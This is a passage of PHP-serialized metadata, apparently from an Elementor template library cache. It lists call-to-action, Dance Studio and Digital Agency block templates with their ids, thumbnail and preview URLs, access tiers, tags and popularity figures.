action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:200;s:16:\"popularity_index\";i:564;s:11:\"trend_index\";i:677;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:519;a:20:{s:4:\"tmpl\";i:625;s:2:\"id\";i:5860;s:5:\"title\";s:6:\"CTA 17\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_9.png\";s:12:\"tmpl_created\";i:1520520746;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-17/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:201;s:16:\"popularity_index\";i:120;s:11:\"trend_index\";i:63;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:520;a:20:{s:4:\"tmpl\";i:626;s:2:\"id\";i:5869;s:5:\"title\";s:6:\"CTA 18\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_10.png\";s:12:\"tmpl_created\";i:1520520747;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-18/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:204;s:16:\"popularity_index\";i:345;s:11:\"trend_index\";i:486;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:521;a:20:{s:4:\"tmpl\";i:611;s:2:\"id\";i:5542;s:5:\"title\";s:6:\"CTA 19\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_1.png\";s:12:\"tmpl_created\";i:1520520681;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-19/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:205;s:16:\"popularity_index\";i:169;s:11:\"trend_index\";i:270;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:522;a:20:{s:4:\"tmpl\";i:614;s:2:\"id\";i:5567;s:5:\"title\";s:5:\"CTA 2\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_2.png\";s:12:\"tmpl_created\";i:1520520685;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/cta-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:207;s:16:\"popularity_index\";i:143;s:11:\"trend_index\";i:225;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:523;a:20:{s:4:\"tmpl\";i:629;s:2:\"id\";i:5893;s:5:\"title\";s:6:\"CTA 21\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_12.png\";s:12:\"tmpl_created\";i:1520520752;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-21/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:210;s:16:\"popularity_index\";i:259;s:11:\"trend_index\";i:457;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:524;a:20:{s:4:\"tmpl\";i:619;s:2:\"id\";i:5634;s:5:\"title\";s:6:\"CTA 24\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_6.png\";s:12:\"tmpl_created\";i:1520520699;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-24/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:212;s:16:\"popularity_index\";i:188;s:11:\"trend_index\";i:255;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:525;a:20:{s:4:\"tmpl\";i:620;s:2:\"id\";i:5642;s:5:\"title\";s:6:\"CTA 25\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_6.png\";s:12:\"tmpl_created\";i:1520520701;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-25/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:214;s:16:\"popularity_index\";i:226;s:11:\"trend_index\";i:262;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:526;a:20:{s:4:\"tmpl\";i:615;s:2:\"id\";i:5583;s:5:\"title\";s:6:\"CTA 26\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_3.png\";s:12:\"tmpl_created\";i:1520520689;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-26/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:216;s:16:\"popularity_index\";i:117;s:11:\"trend_index\";i:117;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:527;a:20:{s:4:\"tmpl\";i:630;s:2:\"id\";i:5904;s:5:\"title\";s:6:\"CTA 27\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_13.png\";s:12:\"tmpl_created\";i:1520520754;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-27/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:217;s:16:\"popularity_index\";i:528;s:11:\"trend_index\";i:517;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:528;a:20:{s:4:\"tmpl\";i:631;s:2:\"id\";i:5912;s:5:\"title\";s:6:\"CTA 28\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_11.png\";s:12:\"tmpl_created\";i:1520520755;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-28/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:219;s:16:\"popularity_index\";i:665;s:11:\"trend_index\";i:702;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:529;a:20:{s:4:\"tmpl\";i:473;s:2:\"id\";i:5189;s:5:\"title\";s:6:\"CTA 29\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_1.png\";s:12:\"tmpl_created\";i:1520443456;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-29/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:8:\"[\"Form\"]\";s:10:\"menu_order\";i:221;s:16:\"popularity_index\";i:472;s:11:\"trend_index\";i:631;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:530;a:20:{s:4:\"tmpl\";i:623;s:2:\"id\";i:5667;s:5:\"title\";s:5:\"CTA 3\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_8.png\";s:12:\"tmpl_created\";i:1520520705;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/cta-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:222;s:16:\"popularity_index\";i:171;s:11:\"trend_index\";i:250;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:531;a:20:{s:4:\"tmpl\";i:474;s:2:\"id\";i:5198;s:5:\"title\";s:6:\"CTA 30\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_black_1.png\";s:12:\"tmpl_created\";i:1520443458;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-30/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:8:\"[\"Form\"]\";s:10:\"menu_order\";i:225;s:16:\"popularity_index\";i:572;s:11:\"trend_index\";i:511;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:532;a:20:{s:4:\"tmpl\";i:475;s:2:\"id\";i:5206;s:5:\"title\";s:6:\"CTA 31\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_black_2.png\";s:12:\"tmpl_created\";i:1520443459;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-31/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:8:\"[\"Form\"]\";s:10:\"menu_order\";i:226;s:16:\"popularity_index\";i:593;s:11:\"trend_index\";i:611;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:533;a:20:{s:4:\"tmpl\";i:480;s:2:\"id\";i:5249;s:5:\"title\";s:6:\"CTA 32\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_black_4.png\";s:12:\"tmpl_created\";i:1520443470;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-32/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:8:\"[\"Form\"]\";s:10:\"menu_order\";i:228;s:16:\"popularity_index\";i:512;s:11:\"trend_index\";i:409;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:534;a:20:{s:4:\"tmpl\";i:612;s:2:\"id\";i:5550;s:5:\"title\";s:6:\"CTA 33\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_1.png\";s:12:\"tmpl_created\";i:1520520682;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-33/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:231;s:16:\"popularity_index\";i:260;s:11:\"trend_index\";i:562;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:535;a:20:{s:4:\"tmpl\";i:536;s:2:\"id\";i:5852;s:5:\"title\";s:6:\"CTA 34\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2018/03/form_1.png\";s:12:\"tmpl_created\";i:1520443600;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/cta-34/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:8:\"[\"Form\"]\";s:10:\"menu_order\";i:232;s:16:\"popularity_index\";i:563;s:11:\"trend_index\";i:828;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:536;a:20:{s:4:\"tmpl\";i:624;s:2:\"id\";i:5675;s:5:\"title\";s:5:\"CTA 4\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_8.png\";s:12:\"tmpl_created\";i:1520520707;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/cta-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:235;s:16:\"popularity_index\";i:391;s:11:\"trend_index\";i:484;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:537;a:20:{s:4:\"tmpl\";i:616;s:2:\"id\";i:5591;s:5:\"title\";s:5:\"CTA 5\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_4.png\";s:12:\"tmpl_created\";i:1520520691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/cta-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:237;s:16:\"popularity_index\";i:133;s:11:\"trend_index\";i:130;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:538;a:20:{s:4:\"tmpl\";i:617;s:2:\"id\";i:5599;s:5:\"title\";s:5:\"CTA 6\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_4.png\";s:12:\"tmpl_created\";i:1520520693;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/cta-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:239;s:16:\"popularity_index\";i:252;s:11:\"trend_index\";i:362;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:539;a:20:{s:4:\"tmpl\";i:514;s:2:\"id\";i:5575;s:5:\"title\";s:5:\"CTA 7\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_3.png\";s:12:\"tmpl_created\";i:1520443543;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/cta-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:240;s:16:\"popularity_index\";i:13;s:11:\"trend_index\";i:586;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:540;a:20:{s:4:\"tmpl\";i:622;s:2:\"id\";i:5658;s:5:\"title\";s:5:\"CTA 8\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_7.png\";s:12:\"tmpl_created\";i:1520520704;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/cta-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:243;s:16:\"popularity_index\";i:187;s:11:\"trend_index\";i:235;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:541;a:20:{s:4:\"tmpl\";i:621;s:2:\"id\";i:5650;s:5:\"title\";s:5:\"CTA 9\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_7.png\";s:12:\"tmpl_created\";i:1520520702;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/cta-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:244;s:16:\"popularity_index\";i:94;s:11:\"trend_index\";i:148;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:542;a:20:{s:4:\"tmpl\";i:1061;s:2:\"id\";i:15407;s:5:\"title\";s:24:\"Dance Studio &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/10/404.jpg\";s:12:\"tmpl_created\";i:1603181958;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/dance-studio-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:22:\"[\"404\",\"Dance Studio\"]\";s:10:\"menu_order\";i:246;s:16:\"popularity_index\";i:783;s:11:\"trend_index\";i:710;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:543;a:20:{s:4:\"tmpl\";i:1062;s:2:\"id\";i:15400;s:5:\"title\";s:27:\"Dance Studio &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/10/Footer.jpg\";s:12:\"tmpl_created\";i:1603181989;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/dance-studio-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:25:\"[\"Dance Studio\",\"Footer\"]\";s:10:\"menu_order\";i:247;s:16:\"popularity_index\";i:586;s:11:\"trend_index\";i:243;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:544;a:20:{s:4:\"tmpl\";i:1063;s:2:\"id\";i:15391;s:5:\"title\";s:27:\"Dance Studio &#8211; Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/10/Header.jpg\";s:12:\"tmpl_created\";i:1603182011;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/dance-studio-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:25:\"[\"Dance Studio\",\"Header\"]\";s:10:\"menu_order\";i:248;s:16:\"popularity_index\";i:352;s:11:\"trend_index\";i:67;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:545;a:20:{s:4:\"tmpl\";i:874;s:2:\"id\";i:11192;s:5:\"title\";s:14:\"Digital Agency\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/07/Footer_small.jpg\";s:12:\"tmpl_created\";i:1564642399;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/digital-agency-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:39:\"[\"Digital Agency\",\"Footer\",\"Marketing\"]\";s:10:\"menu_order\";i:250;s:16:\"popularity_index\";i:172;s:11:\"trend_index\";i:105;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:546;a:20:{s:4:\"tmpl\";i:873;s:2:\"id\";i:11198;s:5:\"title\";s:14:\"Digital Agency\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-digital-marketing-agency.png\";s:12:\"tmpl_created\";i:1564642395;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/digital-agency-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:39:\"[\"Digital Agency\",\"Header\",\"Marketing\"]\";s:10:\"menu_order\";i:251;s:16:\"popularity_index\";i:34;s:11:\"trend_index\";i:10;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:547;a:20:{s:4:\"tmpl\";i:872;s:2:\"id\";i:11204;s:5:\"title\";s:14:\"Digital Agency\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/07/404_small.jpg\";s:12:\"tmpl_created\";i:1564642389;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/digital-agency-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:36:\"[\"404\",\"Digital Agency\",\"Marketing\"]\";s:10:\"menu_order\";i:253;s:16:\"popularity_index\";i:301;s:11:\"trend_index\";i:239;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:548;a:20:{s:4:\"tmpl\";i:871;s:2:\"id\";i:11220;s:5:\"title\";s:14:\"Digital Agency\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/08/Archive_small1.png\";s:12:\"tmpl_created\";i:1564642385;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/digital-agency-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:30:\"[\"Digital 